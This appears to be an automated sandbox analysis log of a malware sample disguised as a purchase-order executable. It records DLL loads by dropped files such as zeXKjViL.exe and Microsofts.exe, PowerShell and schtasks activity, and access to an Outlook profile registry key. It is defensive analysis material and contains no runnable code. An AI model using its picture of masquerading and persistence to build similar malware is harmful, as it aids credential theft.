                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeSection loaded: mscoree.dll
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeSection loaded: apphelp.dll
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeSection loaded: version.dll
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeSection loaded: uxtheme.dll
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeSection loaded: windows.storage.dll
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeSection loaded: wldp.dll
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeSection loaded: profapi.dll
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeSection loaded: cryptsp.dll
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeSection loaded: rsaenh.dll
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeSection loaded: cryptbase.dll
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeSection loaded: dwrite.dll
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeSection loaded: textshaping.dll
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeSection loaded: amsi.dll
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeSection loaded: userenv.dll
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeSection loaded: msasn1.dll
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeSection loaded: gpapi.dll
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeSection loaded: windowscodecs.dll
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeSection loaded: iconcodecservice.dll
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeSection loaded: propsys.dll
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeSection loaded: edputil.dll
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeSection loaded: urlmon.dll
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeSection loaded: iertutil.dll
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeSection loaded: srvcli.dll
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeSection loaded: netutils.dll
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeSection loaded: windows.staterepositoryps.dll
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeSection loaded: sspicli.dll
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeSection loaded: wintypes.dll
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeSection loaded: appresolver.dll
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeSection loaded: bcp47langs.dll
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeSection loaded: slc.dll
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeSection loaded: sppc.dll
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeSection loaded: onecorecommonproxystub.dll
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeSection loaded: onecoreuapcommonproxystub.dll
                          Source: C:\Windows\System32\alg.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\alg.exeSection loaded: mswsock.dll
                          Source: C:\Windows\System32\alg.exeSection loaded: winhttp.dll
                          Source: C:\Windows\System32\alg.exeSection loaded: mpr.dll
                          Source: C:\Windows\System32\alg.exeSection loaded: secur32.dll
                          Source: C:\Windows\System32\alg.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\alg.exeSection loaded: dnsapi.dll
                          Source: C:\Windows\System32\alg.exeSection loaded: iphlpapi.dll
                          Source: C:\Windows\System32\alg.exeSection loaded: ntmarta.dll
                          Source: C:\Windows\System32\alg.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Windows\System32\alg.exeSection loaded: winnsi.dll
                          Source: C:\Windows\System32\alg.exeSection loaded: dhcpcsvc6.dll
                          Source: C:\Windows\System32\alg.exeSection loaded: dhcpcsvc.dll
                          Source: C:\Windows\System32\alg.exeSection loaded: webio.dll
                          Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Windows\System32\alg.exeSection loaded: rasadhlp.dll
                          Source: C:\Windows\System32\alg.exeSection loaded: fwpuclnt.dll
                          Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Windows\System32\alg.exeSection loaded: drprov.dll
                          Source: C:\Windows\System32\alg.exeSection loaded: winsta.dll
                          Source: C:\Windows\System32\alg.exeSection loaded: ntlanman.dll
                          Source: C:\Windows\System32\alg.exeSection loaded: davclnt.dll
                          Source: C:\Windows\System32\alg.exeSection loaded: davhlpr.dll
                          Source: C:\Windows\System32\alg.exeSection loaded: wkscli.dll
                          Source: C:\Windows\System32\alg.exeSection loaded: cscapi.dll
                          Source: C:\Windows\System32\alg.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\alg.exeSection loaded: browcli.dll
                          Source: C:\Windows\System32\AppVClient.exeSection loaded: appvpolicy.dll
                          Source: C:\Windows\System32\AppVClient.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\AppVClient.exeSection loaded: wtsapi32.dll
                          Source: C:\Windows\System32\AppVClient.exeSection loaded: netapi32.dll
                          Source: C:\Windows\System32\AppVClient.exeSection loaded: secur32.dll
                          Source: C:\Windows\System32\AppVClient.exeSection loaded: wininet.dll
                          Source: C:\Windows\System32\AppVClient.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\AppVClient.exeSection loaded: samcli.dll
                          Source: C:\Windows\System32\AppVClient.exeSection loaded: logoncli.dll
                          Source: C:\Windows\System32\AppVClient.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\AppVClient.exeSection loaded: winhttp.dll
                          Source: C:\Windows\System32\AppVClient.exeSection loaded: mpr.dll
                          Source: C:\Windows\System32\AppVClient.exeSection loaded: dnsapi.dll
                          Source: C:\Windows\System32\AppVClient.exeSection loaded: iphlpapi.dll
                          Source: C:\Windows\System32\AppVClient.exeSection loaded: ntmarta.dll
                          Source: C:\Windows\System32\AppVClient.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\AppVClient.exeSection loaded: appmanagementconfiguration.dll
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: mscoree.dll
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: apphelp.dll
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: version.dll
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: uxtheme.dll
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: windows.storage.dll
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: wldp.dll
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: propsys.dll
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: profapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: edputil.dll
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: urlmon.dll
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: iertutil.dll
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: srvcli.dll
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: netutils.dll
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: windows.staterepositoryps.dll
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: sspicli.dll
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: wintypes.dll
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: appresolver.dll
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: bcp47langs.dll
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: slc.dll
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: userenv.dll
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: sppc.dll
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: onecorecommonproxystub.dll
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: onecoreuapcommonproxystub.dll
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: mscoree.dll
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: apphelp.dll
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: version.dll
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: uxtheme.dll
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: windows.storage.dll
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: wldp.dll
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: profapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: cryptsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: rsaenh.dll
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: cryptbase.dll
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: rasapi32.dll
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: rasman.dll
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: rtutils.dll
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: winhttp.dll
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: iphlpapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: dhcpcsvc6.dll
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: dhcpcsvc.dll
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: winnsi.dll
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: rasadhlp.dll
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: secur32.dll
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: sspicli.dll
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: schannel.dll
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: mskeyprotect.dll
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: ntasn1.dll
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: ncrypt.dll
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: ncryptsslp.dll
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: msasn1.dll
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: gpapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: dpapi.dll
                          Source: C:\Windows\System32\FXSSVC.exeSection loaded: version.dll
                          Source: C:\Windows\System32\FXSSVC.exeSection loaded: tapi32.dll
                          Source: C:\Windows\System32\FXSSVC.exeSection loaded: credui.dll
                          Source: C:\Windows\System32\FXSSVC.exeSection loaded: fxstiff.dll
                          Source: C:\Windows\System32\FXSSVC.exeSection loaded: winhttp.dll
                          Source: C:\Windows\System32\FXSSVC.exeSection loaded: mpr.dll
                          Source: C:\Windows\System32\FXSSVC.exeSection loaded: secur32.dll
                          Source: C:\Windows\System32\FXSSVC.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\FXSSVC.exeSection loaded: dnsapi.dll
                          Source: C:\Windows\System32\FXSSVC.exeSection loaded: iphlpapi.dll
                          Source: C:\Windows\System32\FXSSVC.exeSection loaded: ntmarta.dll
                          Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dll
                          Source: C:\Windows\System32\FXSSVC.exeSection loaded: sppc.dll
                          Source: C:\Windows\System32\FXSSVC.exeSection loaded: fxsresm.dll
                          Source: C:\Windows\System32\FXSSVC.exeSection loaded: ualapi.dll
                          Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dll
                          Source: C:\Windows\System32\FXSSVC.exeSection loaded: sppc.dll
                          Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dll
                          Source: C:\Windows\System32\FXSSVC.exeSection loaded: sppc.dll
                          Source: C:\Windows\System32\FXSSVC.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\FXSSVC.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\FXSSVC.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dll
                          Source: C:\Windows\System32\FXSSVC.exeSection loaded: sppc.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: dbghelp.dll
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: winhttp.dll
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: mpr.dll
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: secur32.dll
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: sspicli.dll
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: dnsapi.dll
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: iphlpapi.dll
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: ntmarta.dll
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: kernel.appcore.dll
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: version.dll
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: msasn1.dll
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: winhttp.dll
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: mpr.dll
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: secur32.dll
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: sspicli.dll
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: dnsapi.dll
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: iphlpapi.dll
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: ntmarta.dll
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeSection loaded: winhttp.dll
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeSection loaded: mpr.dll
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeSection loaded: secur32.dll
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeSection loaded: sspicli.dll
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeSection loaded: iphlpapi.dll
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeSection loaded: uxtheme.dll
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeSection loaded: mscoree.dll
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeSection loaded: ntmarta.dll
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeSection loaded: wldp.dll
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeSection loaded: amsi.dll
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeSection loaded: userenv.dll
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeSection loaded: profapi.dll
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeSection loaded: version.dll
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeSection loaded: winnsi.dll
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeSection loaded: dhcpcsvc6.dll
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeSection loaded: dhcpcsvc.dll
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeSection loaded: webio.dll
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeSection loaded: msasn1.dll
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeSection loaded: gpapi.dll
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeSection loaded: cryptsp.dll
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeSection loaded: rsaenh.dll
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeSection loaded: cryptbase.dll
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeSection loaded: windows.storage.dll
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeSection loaded: textshaping.dll
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeSection loaded: textinputframework.dll
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeSection loaded: coreuicomponents.dll
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeSection loaded: coremessaging.dll
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeSection loaded: coremessaging.dll
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeSection loaded: wintypes.dll
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeSection loaded: wintypes.dll
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeSection loaded: wintypes.dll
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeSection loaded: mscoree.dll
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeSection loaded: apphelp.dll
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeSection loaded: version.dll
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeSection loaded: uxtheme.dll
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeSection loaded: windows.storage.dll
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeSection loaded: wldp.dll
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeSection loaded: profapi.dll
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeSection loaded: cryptsp.dll
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeSection loaded: rsaenh.dll
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeSection loaded: cryptbase.dll
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
